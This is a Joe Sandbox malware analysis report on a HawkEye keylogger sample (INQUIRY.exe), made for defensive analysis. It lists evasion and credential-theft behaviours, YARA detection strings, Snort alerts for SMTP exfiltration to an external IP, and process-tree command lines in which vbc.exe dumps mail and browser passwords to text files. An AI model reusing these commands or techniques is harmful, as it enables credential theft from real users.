Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report INQUIRY.exe

Overview

General Information

Sample Name:INQUIRY.exe
Analysis ID:319686
MD5:0b940145d7d02e5b1b975c99dd5197a4
SHA1:53ae0b576f7b362b90a25ace1470d33068db4490
SHA256:bf487ff7cdbbd998b633b1858a939d8c808bcce65ab9937695475b39deea70a8
Tags:exeHawkEye

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected HawkEye Rat
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to detect sleep reduction / modifications
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
May check the online IP address of the machine
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Startup

  • System is w10x64
  • INQUIRY.exe (PID: 2016 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' MD5: 0B940145D7D02E5B1B975C99DD5197A4)
    • INQUIRY.exe (PID: 5896 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' MD5: 0B940145D7D02E5B1B975C99DD5197A4)
      • dw20.exe (PID: 6868 cmdline: dw20.exe -x -s 2308 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
      • vbc.exe (PID: 6664 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 6700 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • WerFault.exe (PID: 6776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • INQUIRY.exe (PID: 5788 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
      • INQUIRY.exe (PID: 6076 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
        • INQUIRY.exe (PID: 6808 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
          • dw20.exe (PID: 6936 cmdline: dw20.exe -x -s 2272 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
          • vbc.exe (PID: 5684 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • vbc.exe (PID: 4184 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • WerFault.exe (PID: 1076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • INQUIRY.exe (PID: 6792 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
          • INQUIRY.exe (PID: 6400 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
            • INQUIRY.exe (PID: 240 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
              • dw20.exe (PID: 204 cmdline: dw20.exe -x -s 2100 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
            • INQUIRY.exe (PID: 6428 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
              • INQUIRY.exe (PID: 6900 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
                • INQUIRY.exe (PID: 1364 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
                  • dw20.exe (PID: 6380 cmdline: dw20.exe -x -s 2284 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
                  • vbc.exe (PID: 5396 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
                  • vbc.exe (PID: 3064 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
                  • WerFault.exe (PID: 7076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
                • INQUIRY.exe (PID: 4424 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
  • 0x59d3e3:$key: HawkEyeKeylogger
  • 0x59f613:$salt: 099u787978786
  • 0x59da24:$string1: HawkEye_Keylogger
  • 0x59e863:$string1: HawkEye_Keylogger
  • 0x59f573:$string1: HawkEye_Keylogger
  • 0x59ddf9:$string2: holdermail.txt
  • 0x59de19:$string2: holdermail.txt
  • 0x59dd3b:$string3: wallet.dat
  • 0x59dd53:$string3: wallet.dat
  • 0x59dd69:$string3: wallet.dat
  • 0x59f137:$string4: Keylog Records
  • 0x59f44f:$string4: Keylog Records
  • 0x59f66b:$string5: do not script -->
  • 0x59d3cb:$string6: \pidloc.txt
  • 0x59d459:$string7: BSPLIT
  • 0x59d469:$string7: BSPLIT
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmpHawkeyedetect HawkEye in memoryJPCERT/CC Incident Response Group
    • 0x59da7c:$hawkstr1: HawkEye Keylogger
    • 0x59e8a9:$hawkstr1: HawkEye Keylogger
    • 0x59ebd8:$hawkstr1: HawkEye Keylogger
    • 0x59ed33:$hawkstr1: HawkEye Keylogger
    • 0x59ee96:$hawkstr1: HawkEye Keylogger
    • 0x59f10f:$hawkstr1: HawkEye Keylogger
    • 0x59d60a:$hawkstr2: Dear HawkEye Customers!
    • 0x59ec2b:$hawkstr2: Dear HawkEye Customers!
    • 0x59ed82:$hawkstr2: Dear HawkEye Customers!
    • 0x59eee9:$hawkstr2: Dear HawkEye Customers!
    • 0x59d72b:$hawkstr3: HawkEye Logger Details:
    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
    • 0x5a504d:$key: HawkEyeKeylogger
    • 0x5a727d:$salt: 099u787978786
    • 0x5a568e:$string1: HawkEye_Keylogger
    • 0x5a64cd:$string1: HawkEye_Keylogger
    • 0x5a71dd:$string1: HawkEye_Keylogger
    • 0x5a5a63:$string2: holdermail.txt
    • 0x5a5a83:$string2: holdermail.txt
    • 0x5a59a5:$string3: wallet.dat
    • 0x5a59bd:$string3: wallet.dat
    • 0x5a59d3:$string3: wallet.dat
    • 0x5a6da1:$string4: Keylog Records
    • 0x5a70b9:$string4: Keylog Records
    • 0x5a72d5:$string5: do not script -->
    • 0x5a5035:$string6: \pidloc.txt
    • 0x5a50c3:$string7: BSPLIT
    • 0x5a50d3:$string7: BSPLIT
    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
      Click to see the 4 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
      • 0x7b89c:$key: HawkEyeKeylogger
      • 0x7dacc:$salt: 099u787978786
      • 0x7bedd:$string1: HawkEye_Keylogger
      • 0x7cd1c:$string1: HawkEye_Keylogger
      • 0x7da2c:$string1: HawkEye_Keylogger
      • 0x7c2b2:$string2: holdermail.txt
      • 0x7c2d2:$string2: holdermail.txt
      • 0x7c1f4:$string3: wallet.dat
      • 0x7c20c:$string3: wallet.dat
      • 0x7c222:$string3: wallet.dat
      • 0x7d5f0:$string4: Keylog Records
      • 0x7d908:$string4: Keylog Records
      • 0x7db24:$string5: do not script -->
      • 0x7b884:$string6: \pidloc.txt
      • 0x7b912:$string7: BSPLIT
      • 0x7b922:$string7: BSPLIT
      00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
          00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpHawkeyedetect HawkEye in memoryJPCERT/CC Incident Response Group
            • 0x7bf35:$hawkstr1: HawkEye Keylogger
            • 0x7cd62:$hawkstr1: HawkEye Keylogger
            • 0x7d091:$hawkstr1: HawkEye Keylogger
            • 0x7d1ec:$hawkstr1: HawkEye Keylogger
            • 0x7d34f:$hawkstr1: HawkEye Keylogger
            • 0x7d5c8:$hawkstr1: HawkEye Keylogger
            • 0x7bac3:$hawkstr2: Dear HawkEye Customers!
            • 0x7d0e4:$hawkstr2: Dear HawkEye Customers!
            • 0x7d23b:$hawkstr2: Dear HawkEye Customers!
            • 0x7d3a2:$hawkstr2: Dear HawkEye Customers!
            • 0x7bbe4:$hawkstr3: HawkEye Logger Details:
            Click to see the 197 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.vbc.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              16.1.INQUIRY.exe.400000.0.unpackRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
              • 0x112984:$key: HawkEyeKeylogger
              • 0x114bb4:$salt: 099u787978786
              • 0x112fc5:$string1: HawkEye_Keylogger
              • 0x113e04:$string1: HawkEye_Keylogger
              • 0x114b14:$string1: HawkEye_Keylogger
              • 0x11339a:$string2: holdermail.txt
              • 0x1133ba:$string2: holdermail.txt
              • 0x1132dc:$string3: wallet.dat
              • 0x1132f4:$string3: wallet.dat
              • 0x11330a:$string3: wallet.dat
              • 0x1146d8:$string4: Keylog Records
              • 0x1149f0:$string4: Keylog Records
              • 0x114c0c:$string5: do not script -->
              • 0x11296c:$string6: \pidloc.txt
              • 0x1129fa:$string7: BSPLIT
              • 0x112a0a:$string7: BSPLIT
              16.1.INQUIRY.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                16.1.INQUIRY.exe.400000.0.unpackJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
                  16.1.INQUIRY.exe.400000.0.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                    Click to see the 156 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: vbc.exe.6700.6.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
                    Source: vbc.exe.6700.6.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: INQUIRY.exeVirustotal: Detection: 43%Perma Link
                    Source: INQUIRY.exeReversingLabs: Detection: 41%
                    Source: INQUIRY.exeVirustotal: Detection: 43%Perma Link
                    Source: INQUIRY.exeReversingLabs: Detection: 41%
                    Machine Learning detection for sampleShow sources
                    Source: INQUIRY.exeJoe Sandbox ML: detected
                    Source: INQUIRY.exeJoe Sandbox ML: detected
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 32.2.INQUIRY.exe.2680000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 32.2.INQUIRY.exe.2680000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 1.2.INQUIRY.exe.2270000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.2270000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.2.INQUIRY.exe.2370000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.2370000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 0.2.INQUIRY.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 0.2.INQUIRY.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 27.2.INQUIRY.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 27.2.INQUIRY.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.2300000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.2300000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.2.INQUIRY.exe.2490000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.2490000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.2210000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 28.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 13.2.INQUIRY.exe.2660000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 13.2.INQUIRY.exe.2660000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.2380000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.2380000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 32.2.INQUIRY.exe.2630000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 16.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.2240000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.2240000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 32.2.INQUIRY.exe.2680000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 32.2.INQUIRY.exe.2680000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 1.2.INQUIRY.exe.2270000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.2270000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.2.INQUIRY.exe.2370000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.2370000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 0.2.INQUIRY.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 0.2.INQUIRY.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 27.2.INQUIRY.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 27.2.INQUIRY.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.2300000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.2300000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.2.INQUIRY.exe.2490000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.2490000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.2210000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 28.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 13.2.INQUIRY.exe.2660000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 13.2.INQUIRY.exe.2660000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.2380000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.2380000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 32.2.INQUIRY.exe.2630000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 16.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.2240000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.2240000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exeBinary or memory string: [autorun]
                    Source: INQUIRY.exeBinary or memory string: autorun.inf
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exeBinary or memory string: [autorun]
                    Source: INQUIRY.exeBinary or memory string: autorun.inf
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: [autorun]
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004089B8 FindFirstFileA,GetLastError,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004089B8 FindFirstFileA,GetLastError,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004089B8 FindFirstFileA,GetLastError,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: TrafficSnort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49774 -> 166.62.27.57:587
                    Source: TrafficSnort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: TrafficSnort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49774 -> 166.62.27.57:587
                    May check the online IP address of the machineShow sources
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
